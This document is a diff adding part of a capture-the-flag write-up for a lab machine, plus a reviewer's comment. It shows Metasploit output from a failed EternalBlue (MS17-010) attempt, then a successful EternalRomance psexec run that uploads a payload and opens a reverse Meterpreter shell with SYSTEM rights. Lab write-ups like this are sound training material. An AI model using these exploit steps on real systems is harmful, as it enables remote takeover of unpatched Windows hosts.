Legacy.md

```diff
@@ -0,0 +1,163 @@
+[+] 10.10.10.4:445        - Host is likely VULNERABLE to MS17-010! - Windows 5.1
+[*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
+[*] 10.10.10.4:445 - Connecting to target for exploitation.
+[+] 10.10.10.4:445 - Connection established for exploitation.
+[+] 10.10.10.4:445 - Target OS selected valid for OS indicated by SMB reply
+[*] 10.10.10.4:445 - CORE raw buffer dump (11 bytes)
+[*] 10.10.10.4:445 - 0x00000000  57 69 6e 64 6f 77 73 20 35 2e 31                 Windows 5.1     
+[+] 10.10.10.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
+[*] 10.10.10.4:445 - Trying exploit with 12 Groom Allocations.
+[*] 10.10.10.4:445 - Sending all but last fragment of exploit packet
+[*] 10.10.10.4:445 - Starting non-paged pool grooming
+[+] 10.10.10.4:445 - Sending SMBv2 buffers
+[+] 10.10.10.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
+[*] 10.10.10.4:445 - Sending final SMBv2 buffers.
+[*] 10.10.10.4:445 - Sending last fragment of exploit packet!
+[*] 10.10.10.4:445 - Receiving response from exploit packet
+[+] 10.10.10.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
+[*] 10.10.10.4:445 - Sending egg to corrupted connection.
+[*] 10.10.10.4:445 - Triggering free of corrupted buffer.
+[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+```
+Exploit failed.
+
+We try `exploit/windows/smb/ms17_010_psexec` EternalRomance SMB Vuln.
+Use the module, set rhosts to the IP of the box and run.
+
+```console
+msf5 exploit(windows/smb/ms17_010_psexec) > run
+
+[*] Started reverse TCP handler on 10.10.14.14:4444 
+[*] 10.10.10.4:445 - Target OS: Windows 5.1
+[*] 10.10.10.4:445 - Filling barrel with fish... done
+[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
+[*] 10.10.10.4:445 -    [*] Preparing dynamite...
+[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
+[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
+[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
+[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
+[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x8230a598
+[*] 10.10.10.4:445 - Built a write-what-where primitive...
+[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
+[*] 10.10.10.4:445 - Selecting native target
+[*] 10.10.10.4:445 - Uploading payload... jjcqgneP.exe
+[*] 10.10.10.4:445 - Created \jjcqgneP.exe...
+[+] 10.10.10.4:445 - Service started successfully...
+[*] Sending stage (180291 bytes) to 10.10.10.4
+[*] 10.10.10.4:445 - Deleting \jjcqgneP.exe...
+[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.4:1036) at 2020-03-17 03:48:58 -0400
+
+meterpreter > 
+```
+
+Got a session!
```

Comment:
Any possible reason why `ms17_010_eternalblue` did not work while `ms17_010_psexec` opened a session? Maybe a deeper insight into the scripts would give an idea?